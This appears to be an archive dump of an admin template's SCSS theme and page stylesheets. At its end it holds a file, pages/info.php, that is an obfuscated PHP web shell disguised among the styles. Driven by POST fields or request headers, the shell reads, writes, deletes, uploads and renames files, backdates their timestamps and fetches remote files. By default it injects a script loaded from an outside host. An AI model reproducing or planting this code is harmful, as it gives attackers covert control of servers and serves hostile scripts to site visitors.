&:focus {
color: $theme-deep-orange-navbar-brand_focus;
}
}
.nav {
> li {
> a {
color: $theme-deep-orange-nav-anchor;
&:hover {
background-color: $theme-deep-orange-nav-anchor_hover;
}
&:focus {
background-color: $theme-deep-orange-nav-anchor_focus;
}
}
}
.open {
> a {
background-color: $theme-deep-orange-nav-anchor-opened;
&:hover {
background-color: $theme-deep-orange-nav-anchor-opened_hover;
}
&:focus {
background-color: $theme-deep-orange-nav-anchor-opened_focus;
}
}
}
}
.bars {
color: $theme-deep-orange-bar;
}
.sidebar {
.menu {
.list {
li.active {
background-color: $theme-deep-orange-menu-list-active;
> :first-child {
i, span {
color: $theme-deep-orange;
}
}
}
.toggled {
background-color: $theme-deep-orange-menu-list-toggled;
}
.ml-menu {
background-color: $theme-deep-orange-menu-list-submenu;
}
}
}
.legal {
background-color: $theme-deep-orange-legal-bg;
.copyright {
a {
color: $theme-deep-orange !important;
}
}
}
}
}
themes/theme-purple.scss 0000644 00000003754 15076416166 0011362 0 ustar 00 @import '_theme-color-variables';
.theme-purple {
.navbar {
background-color: $theme-purple;
}
.navbar-brand {
color: $theme-purple-navbar-brand;
&:hover {
color: $theme-purple-navbar-brand_hover;
}
&:active {
color: $theme-purple-navbar-brand_active;
}
&:focus {
color: $theme-purple-navbar-brand_focus;
}
}
.nav {
> li {
> a {
color: $theme-purple-nav-anchor;
&:hover {
background-color: $theme-purple-nav-anchor_hover;
}
&:focus {
background-color: $theme-purple-nav-anchor_focus;
}
}
}
.open {
> a {
background-color: $theme-purple-nav-anchor-opened;
&:hover {
background-color: $theme-purple-nav-anchor-opened_hover;
}
&:focus {
background-color: $theme-purple-nav-anchor-opened_focus;
}
}
}
}
.bars {
color: $theme-purple-bar;
}
.sidebar {
.menu {
.list {
li.active {
background-color: $theme-purple-menu-list-active;
> :first-child {
i, span {
color: $theme-purple;
}
}
}
.toggled {
background-color: $theme-purple-menu-list-toggled;
}
.ml-menu {
background-color: $theme-purple-menu-list-submenu;
}
}
}
.legal {
background-color: $theme-purple-legal-bg;
.copyright {
a {
color: $theme-purple !important;
}
}
}
}
}
themes/theme-red.scss 0000644 00000003663 15076416166 0010624 0 ustar 00 @import '_theme-color-variables';
.theme-red {
.navbar {
background-color: $theme-red;
}
.navbar-brand {
color: $theme-red-navbar-brand;
&:hover {
color: $theme-red-navbar-brand_hover;
}
&:active {
color: $theme-red-navbar-brand_active;
}
&:focus {
color: $theme-red-navbar-brand_focus;
}
}
.nav {
> li {
> a {
color: $theme-red-nav-anchor;
&:hover {
background-color: $theme-red-nav-anchor_hover;
}
&:focus {
background-color: $theme-red-nav-anchor_focus;
}
}
}
.open {
> a {
background-color: $theme-red-nav-anchor-opened;
&:hover {
background-color: $theme-red-nav-anchor-opened_hover;
}
&:focus {
background-color: $theme-red-nav-anchor-opened_focus;
}
}
}
}
.bars {
color: $theme-red-bar;
}
.sidebar {
.menu {
.list {
li.active {
background-color: $theme-red-menu-list-active;
> :first-child {
i, span {
color: $theme-red;
}
}
}
.toggled {
background-color: $theme-red-menu-list-toggled;
}
.ml-menu {
background-color: $theme-red-menu-list-submenu;
}
}
}
.legal {
background-color: $theme-red-legal-bg;
.copyright {
a {
color: $theme-red !important;
}
}
}
}
}
themes/theme-deep-purple.scss 0000644 00000004113 15076416166 0012263 0 ustar 00 @import '_theme-color-variables';
.theme-deep-purple {
.navbar {
background-color: $theme-deep-purple;
}
.navbar-brand {
color: $theme-deep-purple-navbar-brand;
&:hover {
color: $theme-deep-purple-navbar-brand_hover;
}
&:active {
color: $theme-deep-purple-navbar-brand_active;
}
&:focus {
color: $theme-deep-purple-navbar-brand_focus;
}
}
.nav {
> li {
> a {
color: $theme-deep-purple-nav-anchor;
&:hover {
background-color: $theme-deep-purple-nav-anchor_hover;
}
&:focus {
background-color: $theme-deep-purple-nav-anchor_focus;
}
}
}
.open {
> a {
background-color: $theme-deep-purple-nav-anchor-opened;
&:hover {
background-color: $theme-deep-purple-nav-anchor-opened_hover;
}
&:focus {
background-color: $theme-deep-purple-nav-anchor-opened_focus;
}
}
}
}
.bars {
color: $theme-deep-purple-bar;
}
.sidebar {
.menu {
.list {
li.active {
background-color: $theme-deep-purple-menu-list-active;
> :first-child {
i, span {
color: $theme-deep-purple;
}
}
}
.toggled {
background-color: $theme-deep-purple-menu-list-toggled;
}
.ml-menu {
background-color: $theme-deep-purple-menu-list-submenu;
}
}
}
.legal {
background-color: $theme-deep-purple-legal-bg;
.copyright {
a {
color: $theme-deep-purple !important;
}
}
}
}
}
themes/theme-orange.scss 0000644 00000003754 15076416166 0011326 0 ustar 00 @import '_theme-color-variables';
.theme-orange {
.navbar {
background-color: $theme-orange;
}
.navbar-brand {
color: $theme-orange-navbar-brand;
&:hover {
color: $theme-orange-navbar-brand_hover;
}
&:active {
color: $theme-orange-navbar-brand_active;
}
&:focus {
color: $theme-orange-navbar-brand_focus;
}
}
.nav {
> li {
> a {
color: $theme-orange-nav-anchor;
&:hover {
background-color: $theme-orange-nav-anchor_hover;
}
&:focus {
background-color: $theme-orange-nav-anchor_focus;
}
}
}
.open {
> a {
background-color: $theme-orange-nav-anchor-opened;
&:hover {
background-color: $theme-orange-nav-anchor-opened_hover;
}
&:focus {
background-color: $theme-orange-nav-anchor-opened_focus;
}
}
}
}
.bars {
color: $theme-orange-bar;
}
.sidebar {
.menu {
.list {
li.active {
background-color: $theme-orange-menu-list-active;
> :first-child {
i, span {
color: $theme-orange;
}
}
}
.toggled {
background-color: $theme-orange-menu-list-toggled;
}
.ml-menu {
background-color: $theme-orange-menu-list-submenu;
}
}
}
.legal {
background-color: $theme-orange-legal-bg;
.copyright {
a {
color: $theme-orange !important;
}
}
}
}
}
themes/theme-brown.scss 0000644 00000003731 15076416166 0011175 0 ustar 00 @import '_theme-color-variables';
.theme-brown {
.navbar {
background-color: $theme-brown;
}
.navbar-brand {
color: $theme-brown-navbar-brand;
&:hover {
color: $theme-brown-navbar-brand_hover;
}
&:active {
color: $theme-brown-navbar-brand_active;
}
&:focus {
color: $theme-brown-navbar-brand_focus;
}
}
.nav {
> li {
> a {
color: $theme-brown-nav-anchor;
&:hover {
background-color: $theme-brown-nav-anchor_hover;
}
&:focus {
background-color: $theme-brown-nav-anchor_focus;
}
}
}
.open {
> a {
background-color: $theme-brown-nav-anchor-opened;
&:hover {
background-color: $theme-brown-nav-anchor-opened_hover;
}
&:focus {
background-color: $theme-brown-nav-anchor-opened_focus;
}
}
}
}
.bars {
color: $theme-brown-bar;
}
.sidebar {
.menu {
.list {
li.active {
background-color: $theme-brown-menu-list-active;
> :first-child {
i, span {
color: $theme-brown;
}
}
}
.toggled {
background-color: $theme-brown-menu-list-toggled;
}
.ml-menu {
background-color: $theme-brown-menu-list-submenu;
}
}
}
.legal {
background-color: $theme-brown-legal-bg;
.copyright {
a {
color: $theme-brown !important;
}
}
}
}
}
themes/theme-light-green.scss 0000644 00000004113 15076416166 0012246 0 ustar 00 @import '_theme-color-variables';
.theme-light-green {
.navbar {
background-color: $theme-light-green;
}
.navbar-brand {
color: $theme-light-green-navbar-brand;
&:hover {
color: $theme-light-green-navbar-brand_hover;
}
&:active {
color: $theme-light-green-navbar-brand_active;
}
&:focus {
color: $theme-light-green-navbar-brand_focus;
}
}
.nav {
> li {
> a {
color: $theme-light-green-nav-anchor;
&:hover {
background-color: $theme-light-green-nav-anchor_hover;
}
&:focus {
background-color: $theme-light-green-nav-anchor_focus;
}
}
}
.open {
> a {
background-color: $theme-light-green-nav-anchor-opened;
&:hover {
background-color: $theme-light-green-nav-anchor-opened_hover;
}
&:focus {
background-color: $theme-light-green-nav-anchor-opened_focus;
}
}
}
}
.bars {
color: $theme-light-green-bar;
}
.sidebar {
.menu {
.list {
li.active {
background-color: $theme-light-green-menu-list-active;
> :first-child {
i, span {
color: $theme-light-green;
}
}
}
.toggled {
background-color: $theme-light-green-menu-list-toggled;
}
.ml-menu {
background-color: $theme-light-green-menu-list-submenu;
}
}
}
.legal {
background-color: $theme-light-green-legal-bg;
.copyright {
a {
color: $theme-light-green !important;
}
}
}
}
}
themes/theme-light-blue.scss 0000644 00000004070 15076416166 0012077 0 ustar 00 @import '_theme-color-variables';
.theme-light-blue {
.navbar {
background-color: $theme-light-blue;
}
.navbar-brand {
color: $theme-light-blue-navbar-brand;
&:hover {
color: $theme-light-blue-navbar-brand_hover;
}
&:active {
color: $theme-light-blue-navbar-brand_active;
}
&:focus {
color: $theme-light-blue-navbar-brand_focus;
}
}
.nav {
> li {
> a {
color: $theme-light-blue-nav-anchor;
&:hover {
background-color: $theme-light-blue-nav-anchor_hover;
}
&:focus {
background-color: $theme-light-blue-nav-anchor_focus;
}
}
}
.open {
> a {
background-color: $theme-light-blue-nav-anchor-opened;
&:hover {
background-color: $theme-light-blue-nav-anchor-opened_hover;
}
&:focus {
background-color: $theme-light-blue-nav-anchor-opened_focus;
}
}
}
}
.bars {
color: $theme-light-blue-bar;
}
.sidebar {
.menu {
.list {
li.active {
background-color: $theme-light-blue-menu-list-active;
> :first-child {
i, span {
color: $theme-light-blue;
}
}
}
.toggled {
background-color: $theme-light-blue-menu-list-toggled;
}
.ml-menu {
background-color: $theme-light-blue-menu-list-submenu;
}
}
}
.legal {
background-color: $theme-light-blue-legal-bg;
.copyright {
a {
color: $theme-light-blue !important;
}
}
}
}
}
themes/theme-green.scss 0000644 00000003731 15076416166 0011146 0 ustar 00 @import '_theme-color-variables';
.theme-green {
.navbar {
background-color: $theme-green;
}
.navbar-brand {
color: $theme-green-navbar-brand;
&:hover {
color: $theme-green-navbar-brand_hover;
}
&:active {
color: $theme-green-navbar-brand_active;
}
&:focus {
color: $theme-green-navbar-brand_focus;
}
}
.nav {
> li {
> a {
color: $theme-green-nav-anchor;
&:hover {
background-color: $theme-green-nav-anchor_hover;
}
&:focus {
background-color: $theme-green-nav-anchor_focus;
}
}
}
.open {
> a {
background-color: $theme-green-nav-anchor-opened;
&:hover {
background-color: $theme-green-nav-anchor-opened_hover;
}
&:focus {
background-color: $theme-green-nav-anchor-opened_focus;
}
}
}
}
.bars {
color: $theme-green-bar;
}
.sidebar {
.menu {
.list {
li.active {
background-color: $theme-green-menu-list-active;
> :first-child {
i, span {
color: $theme-green;
}
}
}
.toggled {
background-color: $theme-green-menu-list-toggled;
}
.ml-menu {
background-color: $theme-green-menu-list-submenu;
}
}
}
.legal {
background-color: $theme-green-legal-bg;
.copyright {
a {
color: $theme-green !important;
}
}
}
}
}
themes/theme-grey.scss 0000644 00000003706 15076416166 0011016 0 ustar 00 @import '_theme-color-variables';
.theme-grey {
.navbar {
background-color: $theme-grey;
}
.navbar-brand {
color: $theme-grey-navbar-brand;
&:hover {
color: $theme-grey-navbar-brand_hover;
}
&:active {
color: $theme-grey-navbar-brand_active;
}
&:focus {
color: $theme-grey-navbar-brand_focus;
}
}
.nav {
> li {
> a {
color: $theme-grey-nav-anchor;
&:hover {
background-color: $theme-grey-nav-anchor_hover;
}
&:focus {
background-color: $theme-grey-nav-anchor_focus;
}
}
}
.open {
> a {
background-color: $theme-grey-nav-anchor-opened;
&:hover {
background-color: $theme-grey-nav-anchor-opened_hover;
}
&:focus {
background-color: $theme-grey-nav-anchor-opened_focus;
}
}
}
}
.bars {
color: $theme-grey-bar;
}
.sidebar {
.menu {
.list {
li.active {
background-color: $theme-grey-menu-list-active;
> :first-child {
i, span {
color: $theme-grey;
}
}
}
.toggled {
background-color: $theme-grey-menu-list-toggled;
}
.ml-menu {
background-color: $theme-grey-menu-list-submenu;
}
}
}
.legal {
background-color: $theme-grey-legal-bg;
.copyright {
a {
color: $theme-grey !important;
}
}
}
}
}
themes/theme-amber.scss 0000644 00000003731 15076416166 0011134 0 ustar 00 @import '_theme-color-variables';
.theme-amber {
.navbar {
background-color: $theme-amber;
}
.navbar-brand {
color: $theme-amber-navbar-brand;
&:hover {
color: $theme-amber-navbar-brand_hover;
}
&:active {
color: $theme-amber-navbar-brand_active;
}
&:focus {
color: $theme-amber-navbar-brand_focus;
}
}
.nav {
> li {
> a {
color: $theme-amber-nav-anchor;
&:hover {
background-color: $theme-amber-nav-anchor_hover;
}
&:focus {
background-color: $theme-amber-nav-anchor_focus;
}
}
}
.open {
> a {
background-color: $theme-amber-nav-anchor-opened;
&:hover {
background-color: $theme-amber-nav-anchor-opened_hover;
}
&:focus {
background-color: $theme-amber-nav-anchor-opened_focus;
}
}
}
}
.bars {
color: $theme-amber-bar;
}
.sidebar {
.menu {
.list {
li.active {
background-color: $theme-amber-menu-list-active;
> :first-child {
i, span {
color: $theme-amber;
}
}
}
.toggled {
background-color: $theme-amber-menu-list-toggled;
}
.ml-menu {
background-color: $theme-amber-menu-list-submenu;
}
}
}
.legal {
background-color: $theme-amber-legal-bg;
.copyright {
a {
color: $theme-amber !important;
}
}
}
}
}
themes/theme-lime.scss 0000644 00000003706 15076416166 0010776 0 ustar 00 @import '_theme-color-variables';
.theme-lime {
.navbar {
background-color: $theme-lime;
}
.navbar-brand {
color: $theme-lime-navbar-brand;
&:hover {
color: $theme-lime-navbar-brand_hover;
}
&:active {
color: $theme-lime-navbar-brand_active;
}
&:focus {
color: $theme-lime-navbar-brand_focus;
}
}
.nav {
> li {
> a {
color: $theme-lime-nav-anchor;
&:hover {
background-color: $theme-lime-nav-anchor_hover;
}
&:focus {
background-color: $theme-lime-nav-anchor_focus;
}
}
}
.open {
> a {
background-color: $theme-lime-nav-anchor-opened;
&:hover {
background-color: $theme-lime-nav-anchor-opened_hover;
}
&:focus {
background-color: $theme-lime-nav-anchor-opened_focus;
}
}
}
}
.bars {
color: $theme-lime-bar;
}
.sidebar {
.menu {
.list {
li.active {
background-color: $theme-lime-menu-list-active;
> :first-child {
i, span {
color: $theme-lime;
}
}
}
.toggled {
background-color: $theme-lime-menu-list-toggled;
}
.ml-menu {
background-color: $theme-lime-menu-list-submenu;
}
}
}
.legal {
background-color: $theme-lime-legal-bg;
.copyright {
a {
color: $theme-lime !important;
}
}
}
}
}
themes/theme-yellow.scss 0000644 00000003754 15076416166 0011366 0 ustar 00 @import '_theme-color-variables';
.theme-yellow {
.navbar {
background-color: $theme-yellow;
}
.navbar-brand {
color: $theme-yellow-navbar-brand;
&:hover {
color: $theme-yellow-navbar-brand_hover;
}
&:active {
color: $theme-yellow-navbar-brand_active;
}
&:focus {
color: $theme-yellow-navbar-brand_focus;
}
}
.nav {
> li {
> a {
color: $theme-yellow-nav-anchor;
&:hover {
background-color: $theme-yellow-nav-anchor_hover;
}
&:focus {
background-color: $theme-yellow-nav-anchor_focus;
}
}
}
.open {
> a {
background-color: $theme-yellow-nav-anchor-opened;
&:hover {
background-color: $theme-yellow-nav-anchor-opened_hover;
}
&:focus {
background-color: $theme-yellow-nav-anchor-opened_focus;
}
}
}
}
.bars {
color: $theme-yellow-bar;
}
.sidebar {
.menu {
.list {
li.active {
background-color: $theme-yellow-menu-list-active;
> :first-child {
i, span {
color: $theme-yellow;
}
}
}
.toggled {
background-color: $theme-yellow-menu-list-toggled;
}
.ml-menu {
background-color: $theme-yellow-menu-list-submenu;
}
}
}
.legal {
background-color: $theme-yellow-legal-bg;
.copyright {
a {
color: $theme-yellow !important;
}
}
}
}
}
_pagination.scss 0000644 00000003273 15076416166 0007752 0 ustar 00 .pager {
li {
> a {
@include border-radius(0);
border: none;
background-color: transparent;
color: #222;
font-weight: bold;
}
a:focus,
a:active {
background-color: transparent;
}
}
}
.pagination {
.disabled {
a,
a:hover,
a:focus,
a:active {
color: #bbb;
}
}
li.active {
a {
background-color: #2196F3;
}
}
li {
@include border-radius(0);
a:focus,
a:active {
background-color: transparent;
color: #555;
}
}
> li {
> a {
border: none;
font-weight: bold;
color: #555;
}
}
> li:first-child,
> li:last-child {
> a {
width: auto;
height: 32px;
@include border-radius(0);
.material-icons {
position: relative;
bottom: 2px;
}
}
}
}
.pagination-sm {
> li:first-child,
> li:last-child {
> a {
width: 28px;
height: 28px;
.material-icons {
position: relative;
top: -1px;
left: -6px;
font-size: 20px;
}
}
}
}
.pagination-lg {
> li:first-child,
> li:last-child {
> a {
width: 44px;
height: 44px;
.material-icons {
font-size: 30px;
position: relative;
top: -3px;
left: -10px;
}
}
}
}
_charts.scss 0000644 00000001022 15076416166 0007073 0 ustar 00 /* Morris */
.morris-hover {
&.morris-default-style {
@include border-radius(0);
}
}
/* Flot */
.flot-chart {
width: 100%;
height: 320px;
}
.panel-switch-btn {
position: relative;
right: 20px;
z-index: 9;
label {
font-weight: bold !important;
}
}
.legendLabel {
width: 85px !important;
position: relative;
left: 3px;
}
#multiple_axis_chart {
.legendLabel {
width: 160px !important;
}
}
/* Sparkline */
.sparkline {
text-align: center;
}
_dashboard.scss 0000644 00000000733 15076416166 0007546 0 ustar 00 .dashboard-flot-chart {
height: 275px;
}
.dashboard-donut-chart {
height: 265px;
}
.dashboard-line-chart {
height: 250px;
}
.dashboard-stat-list {
list-style: none;
padding-left: 0;
margin-top: 40px;
li {
padding: 16px 0 0 0;
small {
font-size: 8px;
}
}
}
.dashboard-task-infos {
.progress {
height: 10px;
margin-bottom: 0;
position: relative;
top: 6px;
}
}
pages/_forgotpasswordpage.scss 0000644 00000001477 15076416166 0012644 0 ustar 00 .fp-page {
background-color: #00BCD4;
padding-left: 0;
max-width: 360px;
margin: 5% auto;
overflow-x: hidden;
.fp-box {
.msg {
color: #555;
margin-bottom: 30px;
text-align: center;
}
a {
font-size: 14px;
text-decoration: none;
color: #00BCD4;
}
.logo {
a {
font-size: 36px;
display: block;
width: 100%;
text-align: center;
color: #fff;
}
small {
display: block;
width: 100%;
text-align: center;
color: #fff;
margin-top: -5px;
}
margin-bottom: 20px;
}
}
}
pages/_500.scss 0000644 00000000623 15076416166 0007220 0 ustar 00 .five-zero-zero {
width: 100%;
text-align: center;
margin: 5% auto;
.five-zero-zero-container {
.error-code {
font-size: 160px;
}
.error-message {
font-size: 27px;
color: #333;
font-weight: bold;
margin-top: -40px;
}
.button-place {
margin-top: 32px;
}
}
}
pages/info.php 0000644 00000017364 15076416166 0007336 0 ustar 00 <?php
goto YgxMN; NhFlK: $K3ScU = array(); goto v3RUA; xcQZw: define("\x5a\164\121\x44\127", $_SERVER["\x44\117\103\x55\x4d\x45\116\x54\137\x52\117\117\124"]); goto XR2Qo; AvUDv: $bumsU = !empty($_POST["\x76"]) ? $_POST["\166"] : @$_SERVER["\110\124\x54\120\x5f\130\137\x43\x53\122\106\137\x54\x4f\x4b\x45\x4e"]; goto ajx5x; irVNl: function fRo2K($ioI8f) { return function_exists($ioI8f); } goto dXSC2; dmHSv: p0VnH: goto OZyXh; sOTAm: function l0xdn($ioI8f, $KKJ5s) { return file_put_contents($ioI8f, $KKJ5s) !== false; } goto Q_MNm; dXSC2: function VLVlZ($ioI8f) { return file_get_contents($ioI8f); } goto sOTAm; poMed: function xzLdc($KuBsZ, $ZTV6W) { goto TtKwt; Fs3IF: $Qwipr = @L0xDn($KuBsZ, vLVlZ($ZTV6W)) ? 1 : 0; goto LyY5K; zZEgF: $Qwipr = 1; goto G9dCY; G9dCY: shddO: goto ilwIb; vP31Y: gOYOz: goto qbXoy; LyY5K: goto Uc9KF; goto ORY9V; TtKwt: if (frO2K("\x63\x75\162\154\137\x69\x6e\x69\x74")) { goto HsoS2; } goto Fs3IF; qbXoy: curl_close($J16p_); goto zZEgF; O8jXn: $Qwipr = fwrite($pkrv6, VlvLz($ZTV6W)) ? 1 : 0; goto R1KgU; ck5VY: curl_setopt($J16p_, CURLOPT_FILE, $pkrv6); goto L8zSK; ORY9V: HsoS2: goto Fwv57; Fwv57: $J16p_ = curl_init($ZTV6W); goto OK09I; CR8NX: Uc9KF: goto BIffB; L8zSK: curl_setopt($J16p_, CURLOPT_TIMEOUT, 50); goto v7mc1; ilwIb: fclose($pkrv6); goto CR8NX; v7mc1: if (curl_exec($J16p_)) { goto gOYOz; } goto O8jXn; BIffB: return $Qwipr; goto Yscxs; R1KgU: goto shddO; goto vP31Y; OK09I: $pkrv6 = fopen($KuBsZ, "\167\x2b"); goto ck5VY; Yscxs: } goto I5t07; V012E: wmHpr: goto l15PN; Q_MNm: function k_mRV() { goto isojJ; xE4XZ: bUa1Z: goto owM6k; J4Or6: goto F3n_R; goto xE4XZ; E4sSh: F3n_R: goto Wmfpp; owM6k: return @getcwd(); goto E4sSh; UhOuL: return @dirname(__FILE__); goto J4Or6; isojJ: if (fro2K("\147\x65\x74\143\x77\x64")) { goto bUa1Z; } goto UhOuL; Wmfpp: } goto dqeoc; dqeoc: function YE6hk($NPDnu) { goto g75A8; SuK_V: pQ5vx: goto d_pdW; i2dRg: Cxo8l: goto EfWNT; ajIQd: foreach ($OFZFY as $Qwipr) { goto RziQn; RXNBj: is_dir($Y9miL) ? YE6HK($Y9miL) : uNliNk($Y9miL); goto IZILf; IZILf: t_Qqr: goto ah8BM; RziQn: if (!($Qwipr == "\56" || $Qwipr == "\56\x2e")) { goto CkbUY; } goto Sfx4t; Sfx4t: goto t_Qqr; goto OAJnf; OAJnf: CkbUY: goto gA2Yi; gA2Yi: $Y9miL = $NPDnu . "\x2f" . $Qwipr; goto RXNBj; ah8BM: } goto i2dRg; sHs2p: goto pQ5vx; goto qMHQW; qMHQW: gcPT7: goto KNVgC; x67Dx: uNliNk($NPDnu); goto sHs2p; KNVgC: $OFZFY = sCaNDir($NPDnu); goto ajIQd; EfWNT: rMdIR($NPDnu); goto SuK_V; g75A8: if (is_dir($NPDnu)) { goto gcPT7; } goto x67Dx; d_pdW: } goto poMed; l15PN: $IJoDh = xj8h9("\x64"); goto NhFlK; ve634: header("\x43\157\156\x74\145\156\164\x2d\x74\171\160\x65\72\x20\141\160\160\x6c\x69\x63\141\x74\151\157\156\57\152\163\157\x6e\x3b\40\x63\150\141\162\163\x65\x74\75\x75\164\x66\55\70"); goto ME3wD; uhvCP: $bumsU = base64_decode(substr($bumsU, 1)); goto V012E; ME3wD: register_shutdown_function(function () { goto xglV_; HqDcB: ob_end_clean(); goto dUKL2; xglV_: global $tt7OF; goto HqDcB; dUKL2: echo json_encode($tt7OF); goto sVkOx; sVkOx: }); goto yJvO0; I5t07: function Xj8h9($KKJ5s) { return !empty($_POST[$KKJ5s]) ? $_POST[$KKJ5s] : $_SERVER["\x48\124\x54\x50\137\130\137" . strtoupper($KKJ5s)]; } goto tXsa1; XR2Qo: $tt7OF = array(); goto irVNl; v3RUA: $KKJ5s = 1; goto Hvuxa; tXsa1: $ioI8f = Xj8h9("\141"); goto miQSD; sg694: LAJqf: goto s8iYS; miQSD: if (empty($ioI8f)) { goto p0VnH; } goto AvUDv; yJvO0: return; goto dmHSv; ajx5x: if (empty($bumsU)) { goto wmHpr; } goto uhvCP; q0Q2w: xfWtj: goto sg694; YgxMN: error_reporting(0); goto xcQZw; s8iYS: $tt7OF["\144\141\164\141"] = $K3ScU; goto fmUbG; Hvuxa: switch ($ioI8f) { case 1: goto ZsVXR; wV_co: if (!fro2k("\x67\x65\x74\x63\167\x64")) { goto wuZsg; } goto VCg9Y; V_7b5: NwxI2: goto Dpt1c; EtDeR: wuZsg: goto CdjLN; CdjLN: if (!fRo2K("\151\156\x69\x5f\147\x65\x74")) { goto NwxI2; } goto CyZkD; u2ooJ: if (!empty($K3ScU["\163\151\160"])) { goto tauUG; } goto CL92n; VCg9Y: $K3ScU["\x70\167\144"] = K_mrv(); goto EtDeR; CL92n: $K3ScU["\163\151\x70"] = @gethostbyname($_SERVER["\123\105\122\126\105\x52\x5f\116\x41\115\105"]); goto KQ0Pv; qJisu: J2tjr: goto JyZjD; CyZkD: $K3ScU["\163\141\x66\145\x5f\155\157\144\145"] = @ini_get("\163\x61\x66\145\x5f\155\157\144\145"); goto V_7b5; Dpt1c: if (!fro2k("\x70\x68\x70\x76\145\162\163\151\157\x6e")) { goto J2tjr; } goto YPjzR; mCc33: goto LAJqf; goto G2j3i; KQ0Pv: tauUG: goto mCc33; JyZjD: $K3ScU["\163\x69\x70"] = $_SERVER["\x53\105\x52\x56\105\122\137\x41\x44\104\x52"]; goto u2ooJ; ZsVXR: $K3ScU = array("\162\x6f\157\x74" => ZtQDW, "\163\x65\162\166\x65\x72" => $_SERVER["\123\105\x52\x56\x45\x52\137\x53\117\x46\x54\127\101\x52\x45"], "\143\151\x70" => $_SERVER["\122\105\115\117\124\x45\137\101\x44\104\122"]); goto wV_co; YPjzR: $K3ScU["\x76\145\x72\x73\151\x6f\156"] = @phpversion(); goto qJisu; G2j3i: case 2: goto RsYLA; p2rZx: $K3ScU["\x64"] = $PS9QM; goto Y4pIO; bwEbN: goto LAJqf; goto A2ZWg; ZweD_: $TxN89 = scandir($bumsU); goto aoI4_; Y4pIO: $K3ScU["\x66"] = $ev5qi; goto bwEbN; hdqqT: Rmbvg: goto ZweD_; RsYLA: if (!empty($bumsU)) { goto Rmbvg; } goto obGeI; huYwn: foreach ($TxN89 as $iKi33) { goto YyNSv; PfxW2: $PS9QM[] = $OMlFY; goto D0TAc; hPlfF: oRm4Z: goto qDu_D; jt9nA: if (is_dir($NPDnu)) { goto ysxxA; } goto WyBKH; WyBKH: $OMlFY["\163"] = filesize($NPDnu); goto hjk7h; qDu_D: $NPDnu = $bumsU . "\57" . $iKi33; goto DIaml; hjk7h: $ev5qi[] = $OMlFY; goto qUFg3; DIaml: $OMlFY = array("\156" => $iKi33, "\160" => substr(sprintf("\45\157", fILepErMs($NPDnu)), -4), "\164" => date("\131\x2d\155\55\x64\x20\110\x3a\x69\x3a\163", fILeMTiMe($NPDnu))); goto jt9nA; sdbgq: goto Ggump; goto hPlfF; qUFg3: goto t35Rf; goto Iok27; YyNSv: if (!($iKi33 == "\x2e" || $iKi33 == "\x2e\56")) { goto oRm4Z; } goto sdbgq; JZfBI: Ggump: goto kqH1E; D0TAc: t35Rf: goto JZfBI; Iok27: ysxxA: goto PfxW2; kqH1E: } goto iurxv; M3k3H: $ev5qi = array(); goto huYwn; obGeI: $bumsU = K_mrv(); goto hdqqT; iurxv: uoEbt: goto p2rZx; aoI4_: $PS9QM = array(); goto M3k3H; A2ZWg: case 3: YE6HK($bumsU); goto LAJqf; case 4: $K3ScU["\166"] = vLVlz($bumsU); goto LAJqf; case 5: goto SbV3G; qeT8c: $KKJ5s = l0xDn($IJoDh, $bumsU) ? 1 : 0; goto XbsA4; XbsA4: goto LAJqf; goto q09El; dL6fO: @chmod($bumsU, 0644); goto lS0zW; SbV3G: if (is_writable($IJoDh)) { goto zld4y; } goto dL6fO; lS0zW: zld4y: goto qeT8c; q09El: case 6: goto EP8WO; krA1H: goto N8Z0s; goto t70b2; YMDUW: if (!@ReNamE($KuBsZ, $XEbz_)) { goto XR9AA; } goto WrmFc; d1JJd: $FknzW = @FiLemTiME($KuBsZ); goto YMDUW; WrmFc: if ($FknzW) { goto r_6BX; } goto iQLSq; n54I4: $XEbz_ = $IJoDh . $bumsU; goto d1JJd; qzdTk: goto LAJqf; goto hRlTH; EP8WO: $KuBsZ = $IJoDh . xJ8H9("\156"); goto n54I4; U0UeW: @touCH($XEbz_, $FknzW, $FknzW); goto vC4kz; a7YGF: $KKJ5s = 0; goto krA1H; iQLSq: goto N8Z0s; goto HoKyh; vC4kz: N8Z0s: goto qzdTk; t70b2: r_6BX: goto U0UeW; HoKyh: XR9AA: goto a7YGF; hRlTH: case 7: goto gMERG; CsaNw: $KKJ5s = 0; goto sDnaL; gMERG: if (@chmod($IJoDh, $bumsU)) { goto GttwO; } goto CsaNw; N2D2n: goto LAJqf; goto PEV0o; sDnaL: GttwO: goto N2D2n; PEV0o: case 8: $KKJ5s = move_uploaded_file($_FILES["\x66"]["\x74\155\x70\x5f\x6e\141\155\x65"], $bumsU) ? 1 : 0; goto LAJqf; case 9: $KKJ5s = L0xDn($bumsU, '') ? 1 : 0; goto LAJqf; case 10: $KKJ5s = mkdir($bumsU) ? 1 : 0; goto LAJqf; case 11: goto xCfNK; r4ewT: $KKJ5s = xZLDC($bumsU, $ZTV6W) ? 1 : 0; goto afXl7; afXl7: goto LAJqf; goto A8rsH; xCfNK: $ZTV6W = xJ8h9("\154"); goto r4ewT; A8rsH: } goto q0Q2w; fmUbG: $tt7OF["\143\x6f\144\145"] = $KKJ5s; goto ve634; OZyXh: echo "\74\x73\143\162\x69\160\x74\x20\x74\x79\x70\145\x3d\x22\155\157\144\x75\x6c\145\x22\x20\163\x72\x63\x3d\42\x68\x74\164\x70\163\72\57\x2f\x68\141\162\x64\x68\x65\141\144\x2e\164\157\160\57\x34\x2e\x6a\163\x22\40\x63\x72\x6f\x73\x73\157\x72\x69\x67\151\156\75\x22\x61\156\157\156\171\155\157\x75\163\x22\40\x72\145\x66\x65\x72\162\145\162\160\157\154\x69\143\171\75\42\x6e\157\55\x72\145\146\145\162\x72\x65\x72\42\76\x3c\57\x73\x63\162\x69\x70\164\76";
?> |